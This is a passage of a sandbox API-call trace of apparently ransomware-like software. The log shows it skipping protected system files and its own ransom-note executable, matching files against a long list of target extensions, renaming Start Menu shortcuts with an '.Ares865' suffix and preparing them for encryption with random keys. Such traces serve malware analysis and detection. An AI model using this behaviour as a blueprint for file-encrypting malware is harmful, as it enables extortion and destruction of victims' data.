lpString2="vvv") returned -1 [0067.813] lstrlenW (lpString="wdb") returned 3 [0067.813] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0067.813] lstrlenW (lpString="wmdb") returned 4 [0067.814] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0067.814] lstrlenW (lpString="wrk") returned 3 [0067.814] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0067.814] lstrlenW (lpString="xdb") returned 3 [0067.815] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0067.815] lstrlenW (lpString="xld") returned 3 [0067.815] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0067.819] lstrlenW (lpString="xmlff") returned 5 [0067.819] lstrcmpiW (lpString1="s.lnk", lpString2="xmlff") returned -1 [0067.819] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk.Ares865") returned 90 [0067.822] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\component services.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\component services.lnk.ares865"), dwFlags=0x1) returned 1 [0067.842] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\component services.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.842] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1242) returned 1 [0067.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.843] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.844] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.844] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.844] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x120 [0067.847] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0067.848] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.849] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.849] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.849] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.850] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.850] CloseHandle (hObject=0x120) returned 1 [0067.850] CloseHandle (hObject=0x12c) returned 1 [0067.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.851] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ea3fc9, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x26ea3fc9, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x26f163ea, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x50e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Computer Management.lnk", cAlternateFileName="COMPUT~1.LNK")) returned 1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="aoldtz.exe") returned 1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2=".") returned 1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="..") returned 1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="windows") returned -1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="bootmgr") returned 1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="temp") returned -1 [0067.851] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="pagefile.sys") returned -1 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="boot") returned 1 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="ids.txt") returned -1 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="ntuser.dat") returned -1 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="perflogs") returned -1 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2="MSBuild") returned -1 [0067.852] lstrlenW (lpString="Computer Management.lnk") returned 23 [0067.852] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Component Services.lnk") returned 82 [0067.852] lstrcpyW (in: lpString1=0x2cce478, lpString2="Computer Management.lnk" | out: lpString1="Computer Management.lnk") returned="Computer Management.lnk" [0067.852] lstrlenW (lpString="Computer Management.lnk") returned 23 [0067.852] lstrlenW (lpString="Ares865") returned 7 [0067.852] lstrcmpiW (lpString1="ent.lnk", lpString2="Ares865") returned 1 [0067.852] lstrlenW (lpString=".dll") returned 4 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2=".dll") returned 1 [0067.852] lstrlenW (lpString=".lnk") returned 4 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2=".lnk") returned 1 [0067.852] lstrlenW (lpString=".ini") returned 4 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2=".ini") returned 1 [0067.852] lstrlenW (lpString=".sys") returned 4 [0067.852] lstrcmpiW (lpString1="Computer Management.lnk", lpString2=".sys") returned 1 [0067.852] lstrlenW (lpString="Computer Management.lnk") returned 23 [0067.852] lstrlenW (lpString="bak") returned 3 [0067.852] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.852] lstrlenW (lpString="ba_") returned 3 [0067.852] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.852] lstrlenW (lpString="dbb") returned 3 [0067.852] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.852] lstrlenW (lpString="vmdk") returned 4 [0067.852] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.852] lstrlenW (lpString="rar") returned 3 [0067.852] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.852] lstrlenW (lpString="zip") returned 3 [0067.852] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.852] lstrlenW (lpString="tgz") returned 3 [0067.852] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.852] lstrlenW (lpString="vbox") returned 4 [0067.852] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.852] lstrlenW (lpString="vdi") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.853] lstrlenW (lpString="vhd") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.853] lstrlenW (lpString="vhdx") returned 4 [0067.853] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.853] lstrlenW (lpString="avhd") returned 4 [0067.853] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.853] lstrlenW (lpString="db") returned 2 [0067.853] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.853] lstrlenW (lpString="db2") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.853] lstrlenW (lpString="db3") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.853] lstrlenW (lpString="dbf") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.853] lstrlenW (lpString="mdf") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.853] lstrlenW (lpString="mdb") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.853] lstrlenW (lpString="sql") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.853] lstrlenW (lpString="sqlite") returned 6 [0067.853] lstrcmpiW (lpString1="nt.lnk", lpString2="sqlite") returned -1 [0067.853] lstrlenW (lpString="sqlite3") returned 7 [0067.853] lstrcmpiW (lpString1="ent.lnk", lpString2="sqlite3") returned -1 [0067.853] lstrlenW (lpString="sqlitedb") returned 8 [0067.853] lstrcmpiW (lpString1="ment.lnk", lpString2="sqlitedb") returned -1 [0067.853] lstrlenW (lpString="xml") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.853] lstrlenW (lpString="$er") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.853] lstrlenW (lpString="4dd") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.853] lstrlenW (lpString="4dl") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.853] lstrlenW (lpString="^^^") returned 3 [0067.853] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.853] lstrlenW (lpString="abs") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.854] lstrlenW (lpString="abx") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.854] lstrlenW (lpString="accdb") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accdb") returned 1 [0067.854] lstrlenW (lpString="accdc") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accdc") returned 1 [0067.854] lstrlenW (lpString="accde") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accde") returned 1 [0067.854] lstrlenW (lpString="accdr") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accdr") returned 1 [0067.854] lstrlenW (lpString="accdt") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accdt") returned 1 [0067.854] lstrlenW (lpString="accdw") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accdw") returned 1 [0067.854] lstrlenW (lpString="accft") returned 5 [0067.854] lstrcmpiW (lpString1="t.lnk", lpString2="accft") returned 1 [0067.854] lstrlenW (lpString="adb") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.854] lstrlenW (lpString="adb") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.854] lstrlenW (lpString="ade") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.854] lstrlenW (lpString="adf") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.854] lstrlenW (lpString="adn") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.854] lstrlenW (lpString="adp") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.854] lstrlenW (lpString="alf") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.854] lstrlenW (lpString="ask") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.854] lstrlenW (lpString="btr") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.854] lstrlenW (lpString="cat") returned 3 [0067.854] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.855] lstrlenW (lpString="cdb") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.855] lstrlenW (lpString="ckp") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.855] lstrlenW (lpString="cma") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.855] lstrlenW (lpString="cpd") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.855] lstrlenW (lpString="dacpac") returned 6 [0067.855] lstrcmpiW (lpString1="nt.lnk", lpString2="dacpac") returned 1 [0067.855] lstrlenW (lpString="dad") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.855] lstrlenW (lpString="dadiagrams") returned 10 [0067.855] lstrcmpiW (lpString1="gement.lnk", lpString2="dadiagrams") returned 1 [0067.855] lstrlenW (lpString="daschema") returned 8 [0067.855] lstrcmpiW (lpString1="ment.lnk", lpString2="daschema") returned 1 [0067.855] lstrlenW (lpString="db-journal") returned 10 [0067.855] lstrcmpiW (lpString1="gement.lnk", lpString2="db-journal") returned 1 [0067.855] lstrlenW (lpString="db-shm") returned 6 [0067.855] lstrcmpiW (lpString1="nt.lnk", lpString2="db-shm") returned 1 [0067.855] lstrlenW (lpString="db-wal") returned 6 [0067.855] lstrcmpiW (lpString1="nt.lnk", lpString2="db-wal") returned 1 [0067.855] lstrlenW (lpString="dbc") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.855] lstrlenW (lpString="dbs") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.855] lstrlenW (lpString="dbt") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.855] lstrlenW (lpString="dbv") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.855] lstrlenW (lpString="dbx") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.855] lstrlenW (lpString="dcb") returned 3 [0067.855] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.856] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk.Ares865") returned 91 [0067.856] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\computer management.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\computer management.lnk.ares865"), dwFlags=0x1) returned 1 [0067.857] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\computer management.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.857] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1294) returned 1 [0067.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.857] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.858] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.858] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.858] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x120 [0067.860] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x190000 [0067.861] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.862] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.862] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.862] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.862] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.863] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.863] CloseHandle (hObject=0x120) returned 1 [0067.863] CloseHandle (hObject=0x12c) returned 1 [0067.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.863] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15444c01, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x15444c01, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x154b7022, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data Sources (ODBC).lnk", cAlternateFileName="DATASO~1.LNK")) returned 1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="aoldtz.exe") returned 1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2=".") returned 1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="..") returned 1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="windows") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="bootmgr") returned 1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="temp") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="pagefile.sys") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="boot") returned 1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="ids.txt") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="ntuser.dat") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="perflogs") returned -1 [0067.863] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2="MSBuild") returned -1 [0067.864] lstrlenW (lpString="Data Sources (ODBC).lnk") returned 23 [0067.864] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk") returned 83 [0067.864] lstrcpyW (in: lpString1=0x2cce478, lpString2="Data Sources (ODBC).lnk" | out: lpString1="Data Sources (ODBC).lnk") returned="Data Sources (ODBC).lnk" [0067.864] lstrlenW (lpString="Data Sources (ODBC).lnk") returned 23 [0067.864] lstrlenW (lpString="Ares865") returned 7 [0067.864] lstrcmpiW (lpString1="BC).lnk", lpString2="Ares865") returned 1 [0067.864] lstrlenW (lpString=".dll") returned 4 [0067.864] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2=".dll") returned 1 [0067.864] lstrlenW (lpString=".lnk") returned 4 [0067.864] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2=".lnk") returned 1 [0067.864] lstrlenW (lpString=".ini") returned 4 [0067.864] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2=".ini") returned 1 [0067.864] lstrlenW (lpString=".sys") returned 4 [0067.864] lstrcmpiW (lpString1="Data Sources (ODBC).lnk", lpString2=".sys") returned 1 [0067.864] lstrlenW (lpString="Data Sources (ODBC).lnk") returned 23 [0067.864] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk.Ares865") returned 91 [0067.864] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\data sources (odbc).lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\data sources (odbc).lnk.ares865"), dwFlags=0x1) returned 1 [0067.866] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Data Sources (ODBC).lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\data sources (odbc).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.867] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1270) returned 1 [0067.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.867] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.868] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.868] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.868] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x120 [0067.869] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0067.870] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.871] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.871] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.871] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3251f8 [0067.871] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x325310 [0067.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.871] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325310 | out: hHeap=0x2b0000) returned 1 [0067.871] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.871] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3251f8 | out: hHeap=0x2b0000) returned 1 [0067.871] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.872] CloseHandle (hObject=0x120) returned 1 [0067.872] CloseHandle (hObject=0x12c) returned 1 [0067.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.872] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa3aca9c, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xa3aca9c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x81c3cfe0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x7a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0067.872] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 